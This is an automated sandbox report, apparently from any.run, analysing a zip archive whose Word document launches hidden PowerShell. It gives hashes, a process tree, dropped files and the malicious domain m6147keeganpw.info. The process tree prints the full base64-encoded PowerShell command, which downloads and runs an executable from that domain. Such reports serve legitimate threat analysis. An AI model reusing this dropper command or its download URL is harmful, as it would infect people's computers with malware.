File name: | Casasantachiara.zip |
Full analysis: | https://app.any.run/tasks/4d0f69a4-ced7-448e-9afd-7cd14ebdc4c1 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 13:22:43 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | CD92571CA4C4C664152FF74112FE77E5 |
SHA1: | 12DA6C89B461C738BCAE442350ABAEAAFB23880A |
SHA256: | 4213DC430165E06BD8458CAA1601B684680BA3335012CF7A86034B309612C2B6 |
SSDEEP: | 768:10rD6P5E+UPzqDOArZ3IML6s2d1FIZ86vPg23yAM52z8gQ8+iRbuFxnxT3cuPyN4:arD6YrqD9rXL6s2d1F80AM52wiuFxnx7 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:06:18 06:02:07 |
ZipCRC: | 0x6b071cb8 |
ZipCompressedSize: | 48819 |
ZipUncompressedSize: | 77312 |
ZipFileName: | info_18.06.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2556 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Casasantachiara.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2864 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2556.8675\info_18.06.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2560 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exec Bypass -enc JABpAFYAbwA4ADcAQgB1ACAAPQAgACcATAB2AEgATABLAHIAJwA7ACQARwBjAE8AVQBUAGEARgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAaQBWAG8AOAA3AEIAdQArACcALgBlAHgAZQAnADsAJABvADQAZgA5AFUAZAA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAGAAVABgAC4AdwBlAGIAYABDAEwAaQBlAE4AVAA7ACQAdgB1AFIARABPAEEAegBDAD0AJwBoAHQAdABwADoALwAvAG0ANgAxADQANwBrAGUAZQBnAGEAbgBwAHcALgBpAG4AZgBvAC8AcwBwADIAOAAyAHkALwBzAGkAMgBzADgAMQAtADEAOQAuAHAAaABwAD8AbAA9AHIAdwBvAHEAMQAuAGQAYQB0ACcALgBzAHAAbABpAHQAKAAnACUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQASQBQAHAAbQA0AE4AaQBXACAAaQBuACAAJAB2AHUAUgBEAE8AQQB6AEMAKQB7AHQAcgB5AHsAJABvADQAZgA5AFUAZAAuAEQAbwB3AE4AbABvAGEARABmAEkAbABFACgAJABJAFAAcABtADQATgBpAFcALAAgACQARwBjAE8AVQBUAGEARgApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEcAYwBPAFUAVABhAEYAKQAuAGwARQBOAEcAdABoACAALQBnAGUAIAB7AG4AdQBtAGIAZQByADEAfQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwBUAGEAUgB0ACgAJABHAGMATwBVAFQAYQBGACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9AA0ACgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR769A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1QEOT9HGKEVR15DP4GDC.temp | — | |
MD5:— | SHA256:— | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:3CD1576AD04C09989593B478F1EA0418 | SHA256:CCE93C13477B2BED5D8A6212C5B043E0D6FB67CEA5A8F4D927A6CE1F15C94804 | |||
2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CB7441065118C05CB2BEC3B25584F336 | SHA256:58D26DDE483E3AFD785EBF275F78B0E1B19D41753FF8A267F6C31004C3AD86C0 | |||
2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13806e.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2556.8675\~$fo_18.06.doc | pgc | |
MD5:5AB7E5934B053FE65714E37274ED3286 | SHA256:F71DE4D96F1737CD4879968FE8F75B27D26B8D412D5BC567123BA8184B2BB8F5 | |||
2556 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2556.8675\info_18.06.doc | document | |
MD5:F5B5F4B4799C3B6E3EA1E48DBC55209A | SHA256:75D08136A8E3034288185D0A453773F43019D7FF792435AF42147280FD632AA8 |
Domain | IP | Reputation |
---|---|---|
m6147keeganpw.info |
| malicious |
dns.msftncsi.com |
| shared |